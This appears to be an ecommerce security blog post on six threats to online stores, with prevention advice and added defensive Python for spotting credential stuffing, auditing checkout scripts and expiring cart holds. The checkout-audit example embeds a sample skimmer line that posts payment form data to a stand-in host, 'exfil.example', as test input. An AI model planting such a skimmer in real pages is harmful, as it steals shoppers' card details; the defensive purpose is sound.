While 2020 saw a rise in ecommerce and online activity, it came with a less-noticed side effect: a parallel rise in cybercrime. The FBI reported spikes in cybercrime from the start of the Covid-19 pandemic, and after its first 100 days Mimecast reported:
- 46% increase in spam attacks
- 75% increase in impersonation attacks
- 385% increase in malware attacks
To help online retailers secure their businesses, we wanted to update our cyberattack prevention guidelines for these new threats. Below, we list the 6 biggest risks to ecommerce cybersecurity — and how to prevent them.
1. Credential Stuffing
What is Credential Stuffing?
Credential stuffing is a form of cyberfraud, or more accurately, a means of committing it. Attackers take the username and password pairs leaked in large data breaches and use automated tools to try those same pairs against other sites, including online stores, betting that many people reuse one password across accounts.
In other words, a login stolen from one breached service is "stuffed" into your login form as-is. It is not a guessing attack: the attacker already holds a pair that was valid somewhere and is simply checking whether it also works on your site.
Credential stuffing is far more efficient and convenient than guessing passwords or brute-forcing them with automated generators. Only a small fraction of the pairs in a leaked list will work on any given site, but with millions of pairs tried automatically that is still a great many accounts, and the attacker's supply grows with every new massive data breach.
How to Prevent Credential Stuffing?
Beyond a web application firewall or a bot-management service with behavioral monitoring, SMBs can rely on simpler controls. Multi-factor authentication (MFA) defeats a stuffed password outright, although it adds friction for some users. Rate-limiting failed logins per client, and watching for a single client that cycles through many different usernames in a short time, catches the automated tooling. Note that the usual "you can't reuse a previous password" rule does nothing here: the reuse that matters is across sites, not within one user's own history. What does help is checking new passwords against lists of known-breached passwords (as NIST SP 800-63B recommends), and forcing a password reset on any account that a flagged client managed to log into, since that password is now known to be both leaked and reused.
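As an added example (not code from the original post), the following Python applies the "one client, many usernames" heuristic described above to login logs, lists the accounts whose reused password actually worked from a flagged client so they can be reset, and checks a candidate password against a set of known-breached password hashes. The log format, IP addresses, account names and breached-password list are all constructed for the example.

```python
"""Spot credential stuffing in login logs and block breached passwords.

Added example, not from the original post. The log format, addresses,
account names and the breached-password list are constructed.
Log line format (tab-separated): <epoch seconds> <client ip> <username> <OK|FAIL>
"""
import hashlib
from collections import defaultdict

# Constructed sample: 203.0.113.7 cycles through eight different accounts in
# a few seconds and gets one hit (classic stuffing); 198.51.100.9 is one
# user mistyping their own password twice before succeeding.
SAMPLE_LOG = """\
1609459200\t203.0.113.7\talice@example.com\tFAIL
1609459201\t203.0.113.7\tbob@example.com\tFAIL
1609459201\t203.0.113.7\tcarol@example.com\tFAIL
1609459202\t203.0.113.7\tdave@example.com\tOK
1609459202\t203.0.113.7\terin@example.com\tFAIL
1609459203\t203.0.113.7\tfrank@example.com\tFAIL
1609459203\t203.0.113.7\tgrace@example.com\tFAIL
1609459204\t203.0.113.7\theidi@example.com\tFAIL
1609459300\t198.51.100.9\tivan@example.com\tFAIL
1609459310\t198.51.100.9\tivan@example.com\tFAIL
1609459320\t198.51.100.9\tivan@example.com\tOK
"""

def parse_log(text):
    """Return a list of (timestamp, ip, username, succeeded) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, user, result = line.split("\t")
        events.append((int(ts), ip, user.lower(), result == "OK"))
    return events

def detect_stuffing(events, window=60, min_users=5, max_success_rate=0.5):
    """Return {ip: (distinct_users, attempts, successes)} for suspicious clients.

    A single client that tries `min_users` or more *distinct* usernames within
    `window` seconds, mostly failing, is replaying a leaked credential list.
    A brute-force against one account, or a user retrying, touches only one
    username and is not flagged by this rule.
    """
    by_ip = defaultdict(list)
    for ts, ip, user, ok in events:
        by_ip[ip].append((ts, user, ok))
    flagged = {}
    for ip, attempts in by_ip.items():
        attempts.sort()
        for i, (start, _, _) in enumerate(attempts):
            in_window = [a for a in attempts[i:] if a[0] - start <= window]
            users = {u for _, u, _ in in_window}
            successes = sum(1 for _, _, ok in in_window if ok)
            if len(users) >= min_users and successes / len(in_window) <= max_success_rate:
                flagged[ip] = (len(users), len(in_window), successes)
                break
    return flagged

def accounts_to_reset(events, flagged):
    """Accounts a flagged client logged into: that password is known to the
    attacker and reused elsewhere, so force a reset and revoke sessions."""
    return {user for _, ip, user, ok in events if ok and ip in flagged}

# Constructed stand-in for a breached-password corpus. Real corpora (for
# example the Pwned Passwords list) are distributed as SHA-1 hashes, so the
# check hashes the candidate and looks the hash up; plaintexts never leave
# your server.
BREACHED_SHA1 = {
    hashlib.sha1(p.encode()).hexdigest().upper()
    for p in ("password", "password123", "123456", "qwerty", "letmein")
}

def is_breached_password(password, corpus=BREACHED_SHA1):
    """True if the password appears in the breached-password corpus."""
    return hashlib.sha1(password.encode()).hexdigest().upper() in corpus

if __name__ == "__main__":
    ev = parse_log(SAMPLE_LOG)
    hits = detect_stuffing(ev)
    for ip, (users, attempts, ok) in hits.items():
        print(f"{ip}: {users} usernames in {attempts} attempts, {ok} succeeded")
    print("reset:", sorted(accounts_to_reset(ev, hits)))
    print("password123 breached:", is_breached_password("password123"))
```

The thresholds (five distinct usernames in a minute, at most half succeeding) are starting points to tune against your own traffic; a shared corporate NAT address can legitimately produce several usernames from one IP, so treat a hit as a reason to step up to MFA or a CAPTCHA for that client rather than to block outright.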
2. E-skimming
What is E-skimming?
Also known as "Magecart attacks," e-skimming is when attackers plant malicious JavaScript on a store's checkout pages so that it copies what shoppers type, namely payment card details, and sends it to a server they control. The code gets in through an unpatched platform or plugin, a compromised admin account, or a compromised third-party script (analytics, chat widgets, tag managers) that the page already loads. Because the skimmer runs in the customer's browser, the store's own servers see nothing unusual, and the card data is stolen even though the connection is encrypted. Some sites and ecommerce platforms are more exposed than others, chiefly those running unpatched software or loading many third-party scripts on the payment page.
How to Prevent E-skimming
The best prevention is to keep the platform, its plugins and its themes patched, because skimmers are commonly installed through known vulnerabilities in software that was never updated. Self-hosted open-source platforms such as WooCommerce (on WordPress) are not inherently weaker, but they put the patching burden on you, and every plugin you add is another thing to keep updated; security plugins help but don't replace updates. Keep the number of third-party scripts on checkout pages to a minimum, pin the ones you do load with Subresource Integrity hashes, restrict which origins may run script with a Content-Security-Policy header, and periodically compare the scripts actually served on the payment page against the list you approved. Make sure your hosting (or the hosting of whatever platform you use) is secure as well, including locked-down admin access, but secure hosting alone does not stop a skimmer delivered through a third-party script.
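As an added example (not code from the original post or any platform's own tooling), the Python below audits the scripts a checkout page actually serves against an allowlist and builds the matching Content-Security-Policy header. The checkout HTML, hostnames and script contents are constructed: the shop's own script is pinned with a correct integrity hash, the payment SDK is approved but unpinned, an analytics script was never approved, and an inline handler posts the payment form to a foreign host, which is the shape of a Magecart skimmer.

```python
"""Audit the scripts a checkout page actually serves against an allowlist.

Added example, not from the original post. The checkout HTML, hostnames and
script contents below are constructed for illustration.
"""
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Scripts that have been reviewed: URL -> the exact bytes that were reviewed.
KNOWN_SCRIPTS = {
    "https://shop.example/static/checkout.js": b"initCheckout();",
    "https://pay.example/v1/sdk.js": b"window.PayExample = {};",
}

def sri_hash(content):
    """Subresource Integrity value for `content`, in the form browsers expect."""
    return "sha384-" + base64.b64encode(hashlib.sha384(content).digest()).decode()

class ScriptCollector(HTMLParser):
    """Collect every <script> with its src, integrity attribute and inline body."""
    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self._current = {"src": a.get("src"), "integrity": a.get("integrity"), "inline": ""}
    def handle_data(self, data):
        if self._current is not None:
            self._current["inline"] += data
    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None

def audit_checkout(html, known=KNOWN_SCRIPTS):
    """Return (reason, detail) findings; an empty list means the page is clean.

    Three things a skimmer needs are refused here: an inline script (nothing
    to pin or review), a script from an origin nobody approved, and an
    approved script whose served bytes no longer match what was reviewed.
    """
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for s in parser.scripts:
        if s["src"] is None:
            if s["inline"].strip():
                findings.append(("inline script on checkout page", s["inline"].strip()[:60]))
        elif s["src"] not in known:
            findings.append(("script from unreviewed origin", s["src"]))
        elif s["integrity"] != sri_hash(known[s["src"]]):
            findings.append(("missing or mismatched integrity hash", s["src"]))
    return findings

def csp_header(known=KNOWN_SCRIPTS):
    """Content-Security-Policy that lets only the approved origins run script,
    so an injected tag pointing anywhere else is blocked by the browser."""
    origins = sorted({f"{urlparse(u).scheme}://{urlparse(u).netloc}" for u in known})
    return "script-src " + " ".join(origins) + "; object-src 'none'; base-uri 'self'"

# Constructed checkout page as served: one correctly pinned script and three problems.
CHECKOUT_HTML = """<html><body>
<form id="payment"><input name="card"><input name="cvv"></form>
<script src="https://shop.example/static/checkout.js" integrity="GOOD_HASH"></script>
<script src="https://pay.example/v1/sdk.js"></script>
<script src="https://cdn-analytics.example/track.js"></script>
<script>
document.getElementById('payment').addEventListener('submit', function (e) {
  fetch('https://exfil.example/c', {method: 'POST', body: new FormData(e.target)});
});
</script>
</body></html>
""".replace("GOOD_HASH", sri_hash(KNOWN_SCRIPTS["https://shop.example/static/checkout.js"]))

if __name__ == "__main__":
    for reason, detail in audit_checkout(CHECKOUT_HTML):
        print(f"{reason}: {detail}")
    print("Content-Security-Policy:", csp_header())
```

Run this against the live page on a schedule, not just at deploy time: a skimmer added through a compromised plugin or a modified third-party file changes what is served without touching your source tree, and the integrity mismatch on an otherwise approved URL is exactly the signal that catches it. Note that SRI only protects scripts whose content you can pin; a provider that changes its SDK without notice will break the pin, which is a feature, since it forces you to review the new version.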
3. Distributed Denial-of-Service (DDoS)
What is DDoS?
A distributed denial-of-service attack, or DDoS, is one of the oldest forms of cybercrime, dating back to the mid-90s. A denial-of-service (DoS) attack floods a site with requests or otherwise exhausts its resources (bandwidth, connections, CPU) so that legitimate users can't get through, effectively taking the site offline. In a distributed attack the traffic comes from many separate sources at once, typically a botnet of compromised machines, so blocking any single source accomplishes little.
How to Prevent DDoS
Because the traffic arrives from thousands of sources and can dwarf a small store's bandwidth, the practical defense is to put a DDoS mitigation service or a content delivery network (CDN) with DDoS protection in front of your site; these absorb and filter the flood before it reaches your servers. Adding server capacity buys headroom against smaller attacks but is easily outscaled, and it does nothing against attacks that hammer an expensive endpoint such as search or checkout rather than raw bandwidth, where per-client rate limiting and caching help. Whatever you use, keep your origin server's address out of public DNS so attackers can't route around the protection.
4. Ransomware
What is Ransomware?
As the name suggests, ransomware is malware that encrypts the files on your systems and demands payment for the key to unlock them. It often arrives through something that looked harmless, such as an employee clicking a malicious link or opening an email attachment, or through exposed remote-access credentials, and once inside it can spread and encrypt quickly. Many current ransomware groups also copy data out before encrypting it and threaten to publish it, so a backup alone doesn't end the extortion.
How to Prevent Ransomware
The good news is that you can recover from ransomware without paying if you keep an offline (or otherwise write-protected) backup of all your files and systems, one that the malware can't reach from the infected network, since ransomware routinely encrypts or deletes any backups it can find. You can then restore from it, just as you would after any other outage that took down your site. Back up frequently, and test a restore before you need it, or you'll be stuck rebooting back to a 2013 version of your store.
5. Denial-of-Inventory Attacks
What is Denial of Inventory?
Technically speaking, a denial-of-inventory attack is a type of denial-of-service (DoS) attack; however, it’s so particular that we wanted to give it its own section. Specifically, denial-of-inventory attacks use bots to place ecommerce items into shopping carts with no intention of buying them.
Not only does this waste server resources and slow down legitimate users like other DoS attacks, it also makes your products appear unavailable: the carted units are reserved, so actual customers can't add them to their own cart. Denial-of-inventory attacks also ruin your analytics, throwing off your abandoned-cart statistics and burning through resources such as automated abandoned-cart emails.
How to Prevent Denial-of-Inventory Attacks?
Your best protection from denial-of-inventory attacks is a bot-management service that can tell automated clients from actual shoppers. Anything short of that involves a little luck, as these bots become more realistic every day. Other options are to limit how long an item stays reserved in an unpurchased cart before it returns to stock, to cap how many units one account (or IP address) can hold at once, and to rate-limit add-to-cart requests.
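As an added example (not code from the original post), the Python below models the two cart-side controls just described: a reservation that expires after a fixed hold time, and a cap on how many units one account may hold. Time is passed in explicitly so the simulation is deterministic; the SKU, stock level, limits and account names are made up.

```python
"""Inventory reservations that expire, so bots cannot park stock indefinitely.

Added example, not from the original post. SKU names, stock levels, hold time,
per-customer cap and account names are constructed.
"""
from collections import defaultdict

class Inventory:
    def __init__(self, stock, hold_seconds=600, max_per_customer=2):
        self.stock = dict(stock)            # sku -> units not currently reserved
        self.hold_seconds = hold_seconds    # how long a carted unit stays reserved
        self.max_per_customer = max_per_customer
        self.holds = []                     # (expires_at, customer, sku, qty)

    def _expire(self, now):
        """Return every unit whose hold timer has run out to available stock."""
        live = []
        for hold in self.holds:
            expires_at, _, sku, qty = hold
            if expires_at <= now:
                self.stock[sku] += qty
            else:
                live.append(hold)
        self.holds = live

    def held_by(self, customer, sku):
        return sum(q for _, c, s, q in self.holds if c == customer and s == sku)

    def add_to_cart(self, customer, sku, qty, now):
        """Reserve qty units for this customer; False if stock or the cap refuses it."""
        self._expire(now)
        if qty <= 0 or self.stock.get(sku, 0) < qty:
            return False
        if self.held_by(customer, sku) + qty > self.max_per_customer:
            return False                    # per-account cap: one bot can't hoard
        self.stock[sku] -= qty
        self.holds.append((now + self.hold_seconds, customer, sku, qty))
        return True

    def checkout(self, customer, now):
        """Turn the customer's live holds into a sale; return {sku: units bought}."""
        self._expire(now)
        bought = defaultdict(int)
        remaining = []
        for hold in self.holds:
            _, c, sku, qty = hold
            if c == customer:
                bought[sku] += qty          # sold: the units never return to stock
            else:
                remaining.append(hold)
        self.holds = remaining
        return dict(bought)

    def available(self, sku, now):
        self._expire(now)
        return self.stock.get(sku, 0)

if __name__ == "__main__":
    # Five bot accounts park ten of eleven units at t=0; a real customer is
    # refused at t=10 and succeeds once the ten-minute holds lapse.
    inv = Inventory({"sneaker-42": 11}, hold_seconds=600, max_per_customer=2)
    for b in range(5):
        inv.add_to_cart(f"bot{b}", "sneaker-42", 2, now=0)
    print("bot0 wants a 3rd unit:", inv.add_to_cart("bot0", "sneaker-42", 1, now=1))
    print("alice at t=10 wants 2:", inv.add_to_cart("alice", "sneaker-42", 2, now=10))
    print("available at t=601:", inv.available("sneaker-42", now=601))
    print("alice at t=601 wants 2:", inv.add_to_cart("alice", "sneaker-42", 2, now=601))
    print("alice buys:", inv.checkout("alice", now=620))
```

The per-account cap is only as good as your account creation controls, since a bot farm simply makes more accounts; the expiring hold is what actually bounds the damage, because the longest any unit can be kept off the shelf without a purchase is one hold period. Pick the hold time from your real checkout durations, and apply the same limits per IP or per device fingerprint if your bot traffic spreads across many accounts.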
6. Phishing
What is Phishing?
Phishing is when a cybercriminal attempts to trick a user into divulging their username and password voluntarily — most often by pretending to work for the site. Typically phishing occurs through email or online chat, but it could conceivably happen anywhere people talk to each other.
Phishing has been a popular approach to cyber fraud for many years now. Because it preys on human error instead of technical vulnerabilities, there’s no way to completely prevent it.
How to Prevent Phishing
No software stops criminals from sending the messages, but you can make impersonating your store harder: publish SPF, DKIM and DMARC records for your domain so that mail forged in your name is rejected by receiving mail servers, and require MFA so that a phished password on its own isn't enough to take over an account. Beyond that, the most effective measure is educating your users about the dangers of phishing.
Make it clear, in no uncertain terms, that you will never ask for their username and password through email or chat. Tell them that if someone claiming to be from your site asks for these, it is a scam. You can also teach them the typical warning signs: excessive typos, mismatched logos, links whose real address doesn't match your domain, and messages that are unexpected or press for immediate action.
Cyberattacks can be a complicated mess, especially the more technical ones such as card-not-present (CNP) fraud. Rather than taking on the attackers yourself, it's often best to enlist the help of cybersecurity apps and services that specialize in protecting online stores from the threats above. To get started, read our guide on Apps to Protect Retailers from Ecommerce Scams.
Editor’s Note: This blog post was originally published January 2015 and was updated in January 2021 to reflect more accurate and relevant information.